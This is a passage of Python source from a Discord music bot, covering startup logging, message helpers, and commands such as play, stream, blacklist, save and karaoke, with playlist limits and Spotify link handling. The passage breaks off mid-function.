async def safe_delete_message(self, message, *, quiet=False):
lfunc = log.debug if quiet else log.warning
try:
return await message.delete()
except discord.Forbidden:
lfunc(
'Cannot delete message "{}", no permission'.format(
message.clean_content
)
)
except discord.NotFound:
lfunc(
'Cannot delete message "{}", message not found'.format(
message.clean_content
)
)
async def safe_edit_message(self, message, new, *, send_if_fail=False, quiet=False):
lfunc = log.debug if quiet else log.warning
try:
return await message.edit(content=new)
except discord.NotFound:
lfunc(
'Cannot edit message "{}", message not found'.format(
message.clean_content
)
)
if send_if_fail:
lfunc("Sending message instead")
return await self.safe_send_message(message.channel, new)
async def send_typing(self, destination):
try:
return await destination.trigger_typing()
except discord.Forbidden:
log.warning(
"Could not send typing to {}, no permission".format(destination)
)
async def restart(self):
self.exit_signal = exceptions.RestartSignal()
await self.close()
def restart_threadsafe(self):
asyncio.run_coroutine_threadsafe(self.restart(), self.loop)
def _cleanup(self):
try:
self.loop.run_until_complete(self.logout())
self.loop.run_until_complete(self.aiosession.close())
except:
pass
pending = asyncio.all_tasks()
gathered = asyncio.gather(*pending)
try:
gathered.cancel()
self.loop.run_until_complete(gathered)
gathered.exception()
except:
pass
# noinspection PyMethodOverriding
def run(self):
try:
self.loop.run_until_complete(self.start(*self.config.auth))
except discord.errors.LoginFailure:
# Add if token, else
raise exceptions.HelpfulError(
"Bot cannot login, bad credentials.",
"Fix your token in the options file. "
"Remember that each field should be on their own line.",
) # ^^^^ In theory self.config.auth should never have no items
finally:
try:
self._cleanup()
except Exception:
log.error("Error in cleanup", exc_info=True)
if self.exit_signal:
raise self.exit_signal # pylint: disable=E0702
async def logout(self):
await self.disconnect_all_voice_clients()
return await super().close()
async def on_error(self, event, *args, **kwargs):
ex_type, ex, stack = sys.exc_info()
if ex_type == exceptions.HelpfulError:
log.error("Exception in {}:\n{}".format(event, ex.message))
await asyncio.sleep(2) # don't ask
await self.logout()
elif issubclass(ex_type, exceptions.Signal):
self.exit_signal = ex_type
await self.logout()
else:
log.error("Exception in {}".format(event), exc_info=True)
async def on_resumed(self):
log.info("\nReconnected to discord.\n")
async def on_ready(self):
dlogger = logging.getLogger("discord")
for h in dlogger.handlers:
if getattr(h, "terminator", None) == "":
dlogger.removeHandler(h)
print()
log.debug("Connection established, ready to go.")
self.ws._keep_alive.name = "Gateway Keepalive"
if self.init_ok:
log.debug("Received additional READY event, may have failed to resume")
return
await self._on_ready_sanity_checks()
self.init_ok = True
################################
log.info(
"Connected: {0}/{1}#{2}".format(
self.user.id, self.user.name, self.user.discriminator
)
)
owner = self._get_owner(voice=True) or self._get_owner()
if owner and self.guilds:
log.info(
"Owner: {0}/{1}#{2}\n".format(
owner.id, owner.name, owner.discriminator
)
)
log.info("Guild List:")
unavailable_servers = 0
for s in self.guilds:
ser = "{} (unavailable)".format(s.name) if s.unavailable else s.name
log.info(" - " + ser)
if self.config.leavenonowners:
if s.unavailable:
unavailable_servers += 1
else:
check = s.get_member(owner.id)
                        if check is None:
await s.leave()
log.info(
"Left {} due to bot owner not found".format(s.name)
)
if unavailable_servers != 0:
log.info(
"Not proceeding with checks in {} servers due to unavailability".format(
str(unavailable_servers)
)
)
elif self.guilds:
log.warning(
"Owner could not be found on any guild (id: %s)\n"
% self.config.owner_id
)
log.info("Guild List:")
for s in self.guilds:
ser = "{} (unavailable)".format(s.name) if s.unavailable else s.name
log.info(" - " + ser)
else:
log.warning("Owner unknown, bot is not on any guilds.")
if self.user.bot:
log.warning(
"To make the bot join a guild, paste this link in your browser. \n"
"Note: You should be logged into your main account and have \n"
"manage server permissions on the guild you want the bot to join.\n"
" " + await self.generate_invite_link()
)
print(flush=True)
if self.config.bound_channels:
chlist = set(self.get_channel(i) for i in self.config.bound_channels if i)
chlist.discard(None)
invalids = set()
invalids.update(c for c in chlist if isinstance(c, discord.VoiceChannel))
chlist.difference_update(invalids)
self.config.bound_channels.difference_update(invalids)
if chlist:
log.info("Bound to text channels:")
[
log.info(" - {}/{}".format(ch.guild.name.strip(), ch.name.strip()))
for ch in chlist
if ch
]
else:
print("Not bound to any text channels")
if invalids and self.config.debug_mode:
print(flush=True)
log.info("Not binding to voice channels:")
[
log.info(" - {}/{}".format(ch.guild.name.strip(), ch.name.strip()))
for ch in invalids
if ch
]
print(flush=True)
else:
log.info("Not bound to any text channels")
if self.config.autojoin_channels:
chlist = set(
self.get_channel(i) for i in self.config.autojoin_channels if i
)
chlist.discard(None)
invalids = set()
invalids.update(c for c in chlist if isinstance(c, discord.TextChannel))
chlist.difference_update(invalids)
self.config.autojoin_channels.difference_update(invalids)
if chlist:
log.info("Autojoining voice channels:")
[
log.info(" - {}/{}".format(ch.guild.name.strip(), ch.name.strip()))
for ch in chlist
if ch
]
else:
log.info("Not autojoining any voice channels")
if invalids and self.config.debug_mode:
print(flush=True)
log.info("Cannot autojoin text channels:")
[
log.info(" - {}/{}".format(ch.guild.name.strip(), ch.name.strip()))
for ch in invalids
if ch
]
self.autojoin_channels = chlist
else:
log.info("Not autojoining any voice channels")
self.autojoin_channels = set()
if self.config.show_config_at_start:
print(flush=True)
log.info("Options:")
log.info(" Command prefix: " + self.config.command_prefix)
log.info(
" Default volume: {}%".format(int(self.config.default_volume * 100))
)
log.info(
" Skip threshold: {} votes or {}%".format(
self.config.skips_required,
fixg(self.config.skip_ratio_required * 100),
)
)
log.info(
" Now Playing @mentions: "
+ ["Disabled", "Enabled"][self.config.now_playing_mentions]
)
log.info(
" Auto-Summon: " + ["Disabled", "Enabled"][self.config.auto_summon]
)
log.info(
" Auto-Playlist: "
+ ["Disabled", "Enabled"][self.config.auto_playlist]
+ " (order: "
+ ["sequential", "random"][self.config.auto_playlist_random]
+ ")"
)
log.info(" Auto-Pause: " + ["Disabled", "Enabled"][self.config.auto_pause])
log.info(
" Delete Messages: "
+ ["Disabled", "Enabled"][self.config.delete_messages]
)
if self.config.delete_messages:
log.info(
" Delete Invoking: "
+ ["Disabled", "Enabled"][self.config.delete_invoking]
)
log.info(" Debug Mode: " + ["Disabled", "Enabled"][self.config.debug_mode])
log.info(
" Downloaded songs will be "
+ ["deleted", "saved"][self.config.save_videos]
)
if self.config.status_message:
log.info(" Status message: " + self.config.status_message)
log.info(
" Write current songs to file: "
+ ["Disabled", "Enabled"][self.config.write_current_song]
)
log.info(
" Author insta-skip: "
+ ["Disabled", "Enabled"][self.config.allow_author_skip]
)
log.info(" Embeds: " + ["Disabled", "Enabled"][self.config.embeds])
log.info(
" Spotify integration: "
+ ["Disabled", "Enabled"][self.config._spotify]
)
log.info(
" Legacy skip: " + ["Disabled", "Enabled"][self.config.legacy_skip]
)
log.info(
" Leave non owners: "
+ ["Disabled", "Enabled"][self.config.leavenonowners]
)
print(flush=True)
await self.update_now_playing_status()
# maybe option to leave the ownerid blank and generate a random command for the owner to use
# wait_for_message is pretty neato
await self._join_startup_channels(
self.autojoin_channels, autosummon=self.config.auto_summon
)
# we do this after the config stuff because it's a lot easier to notice here
if self.config.missing_keys:
log.warning(
"Your config file is missing some options. If you have recently updated, "
"check the example_options.ini file to see if there are new options available to you. "
"The options missing are: {0}".format(self.config.missing_keys)
)
print(flush=True)
# t-t-th-th-that's all folks!
def _gen_embed(self):
"""Provides a basic template for embeds"""
e = discord.Embed()
e.colour = 7506394
e.set_footer(
text=self.config.footer_text, icon_url="https://i.imgur.com/gFHBoZA.png"
)
e.set_author(
name=self.user.name,
url="https://github.com/Just-Some-Bots/MusicBot",
icon_url=self.user.avatar_url,
)
return e
async def cmd_resetplaylist(self, player, channel):
"""
Usage:
{command_prefix}resetplaylist
Resets all songs in the server's autoplaylist
"""
player.autoplaylist = list(set(self.autoplaylist))
return Response(
self.str.get("cmd-resetplaylist-response", "\N{OK HAND SIGN}"),
delete_after=15,
)
async def cmd_help(self, message, channel, command=None):
"""
Usage:
{command_prefix}help [command]
Prints a help message.
If a command is specified, it prints a help message for that command.
Otherwise, it lists the available commands.
"""
self.commands = []
self.is_all = False
prefix = self.config.command_prefix
if command:
if command.lower() == "all":
self.is_all = True
await self.gen_cmd_list(message, list_all_cmds=True)
else:
cmd = getattr(self, "cmd_" + command, None)
if cmd and not hasattr(cmd, "dev_cmd"):
return Response(
"```\n{}```".format(dedent(cmd.__doc__)).format(
command_prefix=self.config.command_prefix
),
delete_after=60,
)
else:
raise exceptions.CommandError(
self.str.get("cmd-help-invalid", "No such command"),
expire_in=10,
)
elif message.author.id == self.config.owner_id:
await self.gen_cmd_list(message, list_all_cmds=True)
else:
await self.gen_cmd_list(message)
desc = (
"```\n"
+ ", ".join(self.commands)
+ "\n```\n"
+ self.str.get(
"cmd-help-response",
"For information about a particular command, run `{}help [command]`\n"
"For further help, see https://just-some-bots.github.io/MusicBot/",
).format(prefix)
)
if not self.is_all:
desc += self.str.get(
"cmd-help-all",
"\nOnly showing commands you can use, for a list of all commands, run `{}help all`",
).format(prefix)
return Response(desc, reply=True, delete_after=60)
async def cmd_blacklist(self, message, user_mentions, option, something):
"""
Usage:
{command_prefix}blacklist [ + | - | add | remove ] @UserName [@UserName2 ...]
Add or remove users to the blacklist.
Blacklisted users are forbidden from using bot commands.
"""
if not user_mentions:
raise exceptions.CommandError("No users listed.", expire_in=20)
if option not in ["+", "-", "add", "remove"]:
raise exceptions.CommandError(
self.str.get(
"cmd-blacklist-invalid",
'Invalid option "{0}" specified, use +, -, add, or remove',
).format(option),
expire_in=20,
)
for user in user_mentions.copy():
if user.id == self.config.owner_id:
print("[Commands:Blacklist] The owner cannot be blacklisted.")
user_mentions.remove(user)
old_len = len(self.blacklist)
if option in ["+", "add"]:
self.blacklist.update(user.id for user in user_mentions)
write_file(self.config.blacklist_file, self.blacklist)
return Response(
self.str.get(
"cmd-blacklist-added", "{0} users have been added to the blacklist"
).format(len(self.blacklist) - old_len),
reply=True,
delete_after=10,
)
else:
if self.blacklist.isdisjoint(user.id for user in user_mentions):
return Response(
self.str.get(
"cmd-blacklist-none",
"None of those users are in the blacklist.",
),
reply=True,
delete_after=10,
)
else:
self.blacklist.difference_update(user.id for user in user_mentions)
write_file(self.config.blacklist_file, self.blacklist)
return Response(
self.str.get(
"cmd-blacklist-removed",
"{0} users have been removed from the blacklist",
).format(old_len - len(self.blacklist)),
reply=True,
delete_after=10,
)
async def cmd_id(self, author, user_mentions):
"""
Usage:
{command_prefix}id [@user]
Tells the user their id or the id of another user.
"""
if not user_mentions:
return Response(
self.str.get("cmd-id-self", "Your ID is `{0}`").format(author.id),
reply=True,
delete_after=35,
)
else:
usr = user_mentions[0]
return Response(
self.str.get("cmd-id-other", "**{0}**s ID is `{1}`").format(
usr.name, usr.id
),
reply=True,
delete_after=35,
)
async def cmd_save(self, player, url=None):
"""
Usage:
{command_prefix}save [url]
Saves the specified song or current song if not specified to the autoplaylist.
"""
if url or (
player.current_entry
and not isinstance(player.current_entry, StreamPlaylistEntry)
):
if not url:
url = player.current_entry.url
if url not in self.autoplaylist:
self.autoplaylist.append(url)
write_file(self.config.auto_playlist_file, self.autoplaylist)
log.debug("Appended {} to autoplaylist".format(url))
return Response(
self.str.get(
"cmd-save-success", "Added <{0}> to the autoplaylist."
).format(url)
)
else:
raise exceptions.CommandError(
self.str.get(
"cmd-save-exists", "This song is already in the autoplaylist."
)
)
else:
raise exceptions.CommandError(
self.str.get("cmd-save-invalid", "There is no valid song playing.")
)
@owner_only
async def cmd_joinserver(self, message, server_link=None):
"""
Usage:
{command_prefix}joinserver invite_link
Asks the bot to join a server. Note: Bot accounts cannot use invite links.
"""
url = await self.generate_invite_link()
return Response(
self.str.get(
"cmd-joinserver-response", "Click here to add me to a server: \n{}"
).format(url),
reply=True,
delete_after=30,
)
async def cmd_karaoke(self, player, channel, author):
"""
Usage:
{command_prefix}karaoke
Activates karaoke mode. During karaoke mode, only groups with the BypassKaraokeMode
permission in the config file can queue music.
"""
player.karaoke_mode = not player.karaoke_mode
return Response(
"\N{OK HAND SIGN} Karaoke mode is now "
+ ["disabled", "enabled"][player.karaoke_mode],
delete_after=15,
)
async def _do_playlist_checks(self, permissions, player, author, testobj):
num_songs = sum(1 for _ in testobj)
        # I have to do extra checks anyways because you can request an arbitrary number of search results
if not permissions.allow_playlists and num_songs > 1:
raise exceptions.PermissionsError(
self.str.get(
"playlists-noperms", "You are not allowed to request playlists"
),
expire_in=30,
)
if (
permissions.max_playlist_length
and num_songs > permissions.max_playlist_length
):
raise exceptions.PermissionsError(
self.str.get(
"playlists-big", "Playlist has too many entries ({0} > {1})"
).format(num_songs, permissions.max_playlist_length),
expire_in=30,
)
# This is a little bit weird when it says (x + 0 > y), I might add the other check back in
if (
permissions.max_songs
and player.playlist.count_for_user(author) + num_songs
> permissions.max_songs
):
raise exceptions.PermissionsError(
self.str.get(
"playlists-limit",
"Playlist entries + your already queued songs reached limit ({0} + {1} > {2})",
).format(
num_songs,
player.playlist.count_for_user(author),
permissions.max_songs,
),
expire_in=30,
)
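        # Worked example (hypothetical numbers): with max_songs = 5, a user who
        # already has 3 songs queued and requests a 4-entry playlist hits
        # 3 + 4 > 5, so the PermissionsError above is raised and nothing is queued.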
return True
async def cmd_play(
self, message, _player, channel, author, permissions, leftover_args, song_url
):
"""
Usage:
{command_prefix}play song_link
{command_prefix}play text to search for
{command_prefix}play spotify_uri
Adds the song to the playlist. If a link is not provided, the first
result from a youtube search is added to the queue.
If enabled in the config, the bot will also support Spotify URIs, however
it will use the metadata (e.g song name and artist) to find a YouTube
equivalent of the song. Streaming from Spotify is not possible.
"""
return await self._cmd_play(
message,
_player,
channel,
author,
permissions,
leftover_args,
song_url,
head=False,
)
async def cmd_playnext(
self, message, _player, channel, author, permissions, leftover_args, song_url
):
"""
Usage:
{command_prefix}playnext song_link
{command_prefix}playnext text to search for
{command_prefix}playnext spotify_uri
Adds the song to the playlist next. If a link is not provided, the first
result from a youtube search is added to the queue.
If enabled in the config, the bot will also support Spotify URIs, however
it will use the metadata (e.g song name and artist) to find a YouTube
equivalent of the song. Streaming from Spotify is not possible.
"""
return await self._cmd_play(
message,
_player,
channel,
author,
permissions,
leftover_args,
song_url,
head=True,
)
async def _cmd_play(
self,
message,
_player,
channel,
author,
permissions,
leftover_args,
song_url,
head,
):
if _player:
player = _player
elif permissions.summonplay:
vc = author.voice.channel if author.voice else None
response = await self.cmd_summon(
channel, channel.guild, author, vc
) # @TheerapakG: As far as I know voice_channel param is unused
if self.config.embeds:
content = self._gen_embed()
content.title = "summon"
content.description = response.content
else:
content = response.content
await self.safe_send_message(
channel,
content,
expire_in=response.delete_after if self.config.delete_messages else 0,
)
player = self.get_player_in(channel.guild)
if not player:
raise exceptions.CommandError(
"The bot is not in a voice channel. "
"Use %ssummon to summon it to your voice channel."
% self.config.command_prefix
)
song_url = song_url.strip("<>")
await self.send_typing(channel)
if leftover_args:
song_url = " ".join([song_url, *leftover_args])
leftover_args = None # prevent some crazy shit happening down the line
# Make sure forward slashes work properly in search queries
linksRegex = "((http(s)*:[/][/]|www.)([a-z]|[A-Z]|[0-9]|[/.]|[~])*)"
pattern = re.compile(linksRegex)
matchUrl = pattern.match(song_url)
song_url = song_url.replace("/", "%2F") if matchUrl is None else song_url
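        # Illustrative (hypothetical input): a plain search like "AC/DC Thunderstruck"
        # does not match linksRegex, so it becomes "AC%2FDC Thunderstruck", while a
        # real URL keeps its path separators.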
# Rewrite YouTube playlist URLs if the wrong URL type is given
playlistRegex = r"watch\?v=.+&(list=[^&]+)"
matches = re.search(playlistRegex, song_url)
groups = matches.groups() if matches is not None else []
song_url = (
"https://www.youtube.com/playlist?" + groups[0]
if len(groups) > 0
else song_url
)
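        # Illustrative (hypothetical URL): ".../watch?v=xxxx&list=PLyyyy" matches
        # playlistRegex and is rewritten to
        # "https://www.youtube.com/playlist?list=PLyyyy" so the whole playlist is used.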
if self.config._spotify:
if "open.spotify.com" in song_url:
song_url = "spotify:" + re.sub(
"(http[s]?:\/\/)?(open.spotify.com)\/", "", song_url
).replace("/", ":")
# remove session id (and other query stuff)
song_url = re.sub("\?.*", "", song_url)
if song_url.startswith("spotify:"):
parts = song_url.split(":")
try:
if "track" in parts:
res = await self.spotify.get_track(parts[-1])
song_url = res["artists"][0]["name"] + " " + res["name"]
elif "album" in parts:
res = await self.spotify.get_album(parts[-1])
await self._do_playlist_checks(
permissions, player, author, res["tracks"]["items"]
)
procmesg = await self.safe_send_message(
channel,
self.str.get(
"cmd-play-spotify-album-process",
"Processing album `{0}` (`{1}`)",
).format(res["name"], song_url),
)
for i in res["tracks"]["items"]:
song_url = i["name"] + " " + i["artists"][0]["name"]
log.debug("Processing {0}".format(song_url))
await self.cmd_play(
message,
player,
channel,
author,
permissions,
leftover_args,
song_url,
)
await self.safe_delete_message(procmesg)
return Response(
self.str.get(
"cmd-play-spotify-album-queued",
"Enqueued `{0}` with **{1}** songs.",
).format(res["name"], len(res["tracks"]["items"]))
)
elif "playlist" in parts:
res = []
r = await self.spotify.get_playlist_tracks(parts[-1])
while True:
res.extend(r["items"])
if r["next"] is not None:
r = await self.spotify.make_spotify_req(r["next"])
continue
else:
break
await self._do_playlist_checks(permissions, player, author, res)
procmesg = await self.safe_send_message(
channel,
self.str.get(
"cmd-play-spotify-playlist-process",
"Processing playlist `{0}` (`{1}`)",
).format(parts[-1], song_url),
)
for i in res:
song_url = (
i["track"]["name"]
+ " "
+ i["track"]["artists"][0]["name"]
)
log.debug("Processing {0}".format(song_url))
await self.cmd_play(
message,
player,
channel,
author,
permissions,
leftover_args,
song_url,
)
await self.safe_delete_message(procmesg)
return Response(
self.str.get(
"cmd-play-spotify-playlist-queued",
"Enqueued `{0}` with **{1}** songs.",
).format(parts[-1], len(res))
)
else:
raise exceptions.CommandError(
self.str.get(
"cmd-play-spotify-unsupported",
"That is not a supported Spotify URI.",
),
expire_in=30,
)
except exceptions.SpotifyError:
raise exceptions.CommandError(
self.str.get(
"cmd-play-spotify-invalid",
"You either provided an invalid URI, or there was a problem.",
)
)
async def get_info(song_url):
info = await self.downloader.extract_info(
player.playlist.loop, song_url, download=False, process=False
)
            # If an exception arises while processing, we carry on and let extract_info further down the line report it,
            # because info might be a playlist and the thing that broke might be an individual entry.
try:
info_process = await self.downloader.extract_info(
player.playlist.loop, song_url, download=False
)
info_process_err = None
except Exception as e:
info_process = None
info_process_err = e
return (info, info_process, info_process_err)
        # This lock prevents spamming the play command to add entries that exceed the time limit / maximum song limit
async with self.aiolocks[_func_() + ":" + str(author.id)]:
if (
permissions.max_songs
and player.playlist.count_for_user(author) >= permissions.max_songs
):
raise exceptions.PermissionsError(
self.str.get(
"cmd-play-limit",
"You have reached your enqueued song limit ({0})",
).format(permissions.max_songs),
expire_in=30,
)
if player.karaoke_mode and not permissions.bypass_karaoke_mode:
raise exceptions.PermissionsError(
self.str.get(
"karaoke-enabled",
"Karaoke mode is enabled, please try again when its disabled!",
),
expire_in=30,
)
# Try to determine entry type, if _type is playlist then there should be entries
while True:
try:
info, info_process, info_process_err = await get_info(song_url)
log.debug(info)
if (
info_process
and info
and info_process.get("_type", None) == "playlist"
and "entries" not in info
and not info.get("url", "").startswith("ytsearch")
):
use_url = info_process.get(
"webpage_url", None
) or info_process.get("url", None)
if use_url == song_url:
log.warning(
"Determined incorrect entry type, but suggested url is the same. Help."
)
break # If we break here it will break things down the line and give "This is a playlist" exception as a result
log.debug(
'Assumed url "%s" was a single entry, was actually a playlist'
% song_url
)
log.debug('Using "%s" instead' % use_url)
song_url = use_url
else:
break
except Exception as e:
if "unknown url type" in str(e):
song_url = song_url.replace(
":", ""
) # it's probably not actually an extractor
info, info_process, info_process_err = await get_info(song_url)
else:
raise exceptions.CommandError(e, expire_in=30)
if not info:
raise exceptions.CommandError(
self.str.get(
"cmd-play-noinfo",
"That video cannot be played. Try using the {0}stream command.",
).format(self.config.command_prefix),
expire_in=30,
)
if (
info.get("extractor", "") not in permissions.extractors
and permissions.extractors
):
raise exceptions.PermissionsError(
self.str.get(
"cmd-play-badextractor",
"You do not have permission to play media from this service.",
),
expire_in=30,
)
# abstract the search handling away from the user
# our ytdl options allow us to use search strings as input urls
if info.get("url", "").startswith("ytsearch"):
# print("[Command:play] Searching for \"%s\"" % song_url)
if info_process:
info = info_process
else:
await self.safe_send_message(
channel, "```\n%s\n```" % info_process_err, expire_in=120
)
raise exceptions.CommandError(
self.str.get(
"cmd-play-nodata",
"Error extracting info from search string, youtubedl returned no data. "
"You may need to restart the bot if this continues to happen.",
),
expire_in=30,
)
song_url = info_process.get("webpage_url", None) or info_process.get(
"url", None
)
if "entries" in info:
# if entry is playlist then only get the first one
song_url = info["entries"][0]["webpage_url"]
info = info["entries"][0]
# If it's playlist
if "entries" in info:
await self._do_playlist_checks(
permissions, player, author, info["entries"]
)
num_songs = sum(1 for _ in info["entries"])
if info["extractor"].lower() in [
"youtube:playlist",
"soundcloud:set",
"bandcamp:album",
]:
try:
return await self._cmd_play_playlist_async(
player,
channel,
author,
permissions,
song_url,
info["extractor"],
)
except exceptions.CommandError:
raise
except Exception as e:
log.error("Error queuing playlist", exc_info=True)
raise exceptions.CommandError(
self.str.get(
"cmd-play-playlist-error",
"Error queuing playlist:\n`{0}`",
).format(e),
expire_in=30,
)
t0 = time.time()
# My test was 1.2 seconds per song, but we maybe should fudge it a bit, unless we can
# monitor it and edit the message with the estimated time, but that's some ADVANCED SHIT
# I don't think we can hook into it anyways, so this will have to do.
# It would probably be a thread to check a few playlists and get the speed from that
# Different playlists might download at different speeds though
wait_per_song = 1.2
procmesg = await self.safe_send_message(
channel,
self.str.get(
"cmd-play-playlist-gathering-1",
"Gathering playlist information for {0} songs{1}",
).format(
num_songs,
self.str.get(
"cmd-play-playlist-gathering-2", ", ETA: {0} seconds"
).format(fixg(num_songs * wait_per_song))
if num_songs >= 10
else ".",
),
)
# We don't have a pretty way of doing this yet. We need either a loop
# that sends these every 10 seconds or a nice context manager.
await self.send_typing(channel)
# TODO: I can create an event emitter object instead, add event functions, and every play list might be asyncified
# Also have a "verify_entry" hook with the entry as an arg and returns the entry if its ok
entry_list, position = await player.playlist.import_from(
song_url, channel=channel, author=author, head=False
)
tnow = time.time()
ttime = tnow - t0
listlen = len(entry_list)
drop_count = 0
if permissions.max_song_length:
for e in entry_list.copy():
if e.duration > permissions.max_song_length:
player.playlist.entries.remove(e)
entry_list.remove(e)
drop_count += 1
# I'm pretty sure there's no situation where this would ever break,
# unless the first entry starts being played, which would make this a race condition
if drop_count:
log.debug("Dropped %s songs" % drop_count)
log.info(
"Processed {} songs in {} seconds at {:.2f}s/song, {:+.2g}/song from expected ({}s)".format(
listlen,
fixg(ttime),
ttime / listlen if listlen else 0,
ttime / listlen - wait_per_song
if listlen - wait_per_song
else 0,
fixg(wait_per_song * num_songs),
)
)
await self.safe_delete_message(procmesg)
if not listlen - drop_count:
raise exceptions.CommandError(
self.str.get(
"cmd-play-playlist-maxduration",
"No songs were added, all songs were over max duration (%ss)",
)
% permissions.max_song_length,
expire_in=30,
)
reply_text = self.str.get(
"cmd-play-playlist-reply",
"Enqueued **%s** songs to be played. Position in queue: %s",
)
btext = str(listlen - drop_count)
# If it's an entry
else:
# youtube:playlist extractor but it's actually an entry
if info.get("extractor", "").startswith("youtube:playlist"):
try:
info = await self.downloader.extract_info(
player.playlist.loop,
"https://www.youtube.com/watch?v=%s" % info.get("url", ""),
download=False,
process=False,
)
except Exception as e:
raise exceptions.CommandError(e, expire_in=30)
if (
permissions.max_song_length
and info.get("duration", 0) > permissions.max_song_length
):
raise exceptions.PermissionsError(
self.str.get(
"cmd-play-song-limit",
"Song duration exceeds limit ({0} > {1})",
).format(info["duration"], permissions.max_song_length),
expire_in=30,
)
entry, position = await player.playlist.add_entry(
song_url, channel=channel, author=author, head=head
)
reply_text = self.str.get(
"cmd-play-song-reply",
"Enqueued `%s` to be played. Position in queue: %s",
)
btext = entry.title
if position == 1 and player.is_stopped:
position = self.str.get("cmd-play-next", "Up next!")
reply_text %= (btext, position)
else:
reply_text %= (btext, position)
try:
time_until = await player.playlist.estimate_time_until(
position, player
)
reply_text += self.str.get(
"cmd-play-eta", " - estimated time until playing: %s"
) % ftimedelta(time_until)
except exceptions.InvalidDataError:
reply_text += self.str.get(
"cmd-play-eta-error", " - cannot estimate time until playing"
)
except:
traceback.print_exc()
return Response(reply_text, delete_after=30)
async def _cmd_play_playlist_async(
self, player, channel, author, permissions, playlist_url, extractor_type
):
"""
Secret handler to use the async wizardry to make playlist queuing non-"blocking"
"""
await self.send_typing(channel)
info = await self.downloader.extract_info(
player.playlist.loop, playlist_url, download=False, process=False
)
if not info:
raise exceptions.CommandError(
self.str.get(
"cmd-play-playlist-invalid", "That playlist cannot be played."
)
)
num_songs = sum(1 for _ in info["entries"])
t0 = time.time()
busymsg = await self.safe_send_message(
channel,
self.str.get("cmd-play-playlist-process", "Processing {0} songs...").format(
num_songs
),
) # TODO: From playlist_title
await self.send_typing(channel)
entries_added = 0
if extractor_type == "youtube:playlist":
try:
entries_added = await player.playlist.async_process_youtube_playlist(
playlist_url, channel=channel, author=author
)
# TODO: Add hook to be called after each song
# TODO: Add permissions
except Exception:
log.error("Error processing playlist", exc_info=True)
raise exceptions.CommandError(
self.str.get(
"cmd-play-playlist-queueerror",
"Error handling playlist {0} queuing.",
).format(playlist_url),
expire_in=30,
)
elif extractor_type.lower() in ["soundcloud:set", "bandcamp:album"]:
try:
entries_added = await player.playlist.async_process_sc_bc_playlist(
playlist_url, channel=channel, author=author
)
# TODO: Add hook to be called after each song
# TODO: Add permissions
except Exception:
log.error("Error processing playlist", exc_info=True)
raise exceptions.CommandError(
self.str.get(
"cmd-play-playlist-queueerror",
"Error handling playlist {0} queuing.",
).format(playlist_url),
expire_in=30,
)
songs_processed = len(entries_added)
drop_count = 0
skipped = False
if permissions.max_song_length:
for e in entries_added.copy():
if e.duration > permissions.max_song_length:
try:
player.playlist.entries.remove(e)
entries_added.remove(e)
drop_count += 1
except:
pass
if drop_count:
log.debug("Dropped %s songs" % drop_count)
if (
player.current_entry
and player.current_entry.duration > permissions.max_song_length
):
await self.safe_delete_message(
self.server_specific_data[channel.guild]["last_np_msg"]
)
self.server_specific_data[channel.guild]["last_np_msg"] = None
skipped = True
player.skip()
entries_added.pop()
await self.safe_delete_message(busymsg)
songs_added = len(entries_added)
tnow = time.time()
ttime = tnow - t0
wait_per_song = 1.2
# TODO: actually calculate wait per song in the process function and return that too
# This is technically inaccurate since bad songs are ignored but still take up time
log.info(
"Processed {}/{} songs in {} seconds at {:.2f}s/song, {:+.2g}/song from expected ({}s)".format(
songs_processed,
num_songs,
fixg(ttime),
ttime / num_songs if num_songs else 0,
ttime / num_songs - wait_per_song if num_songs - wait_per_song else 0,
fixg(wait_per_song * num_songs),
)
)
if not songs_added:
basetext = (
self.str.get(
"cmd-play-playlist-maxduration",
"No songs were added, all songs were over max duration (%ss)",
)
% permissions.max_song_length
)
if skipped:
basetext += self.str.get(
"cmd-play-playlist-skipped",
"\nAdditionally, the current song was skipped for being too long.",
)
raise exceptions.CommandError(basetext, expire_in=30)
return Response(
self.str.get(
"cmd-play-playlist-reply-secs",
"Enqueued {0} songs to be played in {1} seconds",
).format(songs_added, fixg(ttime, 1)),
delete_after=30,
)
async def cmd_stream(self, _player, channel, author, permissions, song_url):
"""
Usage:
{command_prefix}stream song_link
Enqueue a media stream.
This could mean an actual stream like Twitch or shoutcast, or simply streaming
media without predownloading it. Note: FFmpeg is notoriously bad at handling
streams, especially on poor connections. You have been warned.
"""
if _player:
player = _player
elif permissions.summonplay:
vc = author.voice.channel if author.voice else None
response = await self.cmd_summon(
channel, channel.guild, author, vc
) # @TheerapakG: As far as I know voice_channel param is unused
if self.config.embeds:
content = self._gen_embed()
content.title = "summon"
content.description = response.content
else:
content = response.content
await self.safe_send_message(
channel,
content,
expire_in=response.delete_after if self.config.delete_messages else 0,
)
player = self.get_player_in(channel.guild)
if not player:
raise exceptions.CommandError(
"The bot is not in a voice channel. "
"Use %ssummon to summon it to your voice channel."
% self.config.command_prefix
)
song_url = song_url.strip("<>")
if (
permissions.max_songs
and player.playlist.count_for_user(author) >= permissions.max_songs
):
raise exceptions.PermissionsError(
self.str.get(
"cmd-stream-limit",
"You have reached your enqueued song limit ({0})",
).format(permissions.max_songs),
expire_in=30,
)
if player.karaoke_mode and not permissions.bypass_karaoke_mode:
raise exceptions.PermissionsError(
self.str.get(
"karaoke-enabled",
"Karaoke mode is enabled, please try again when it's disabled!",
),
expire_in=30,
)
await self.send_typing(channel)
await player.playlist.add_stream_entry(song_url, channel=channel, author=author)
return Response(
self.str.get("cmd-stream-success", "Streaming."), delete_after=6
)
async def cmd_search(
self, message, player, channel, author, permissions, leftover_args
):
"""
Usage:
{command_prefix}search [service] [number] query
Searches a service for a video and adds it to the queue.
- service: any one of the following services:
- youtube (yt) (default if unspecified)
- soundcloud (sc)
- yahoo (yh)
- number: return a number of video results and waits for user to choose one
- defaults to 3 if unspecified
- note: If your search query starts with a number,
you must put your query in quotes
- ex: {command_prefix}search 2 "I ran seagulls"
The command issuer can use reactions to indicate their response to each result.
"""
if (
permissions.max_songs
and player.playlist.count_for_user(author) > permissions.max_songs
):
raise exceptions.PermissionsError(
self.str.get(
"cmd-search-limit",
"You have reached your playlist item limit ({0})",
).format(permissions.max_songs),
expire_in=30,
)
if player.karaoke_mode and not permissions.bypass_karaoke_mode:
raise exceptions.PermissionsError(
self.str.get(
"karaoke-enabled",
"Karaoke mode is enabled, please try again when it's disabled!",
),
expire_in=30,
)
def argcheck():
if not leftover_args:
# noinspection PyUnresolvedReferences
raise exceptions.CommandError(
self.str.get(
"cmd-search-noquery", "Please specify a search query.\n%s"
)
% dedent(
self.cmd_search.__doc__.format(
command_prefix=self.config.command_prefix
)
),
expire_in=60,
)
argcheck()
try:
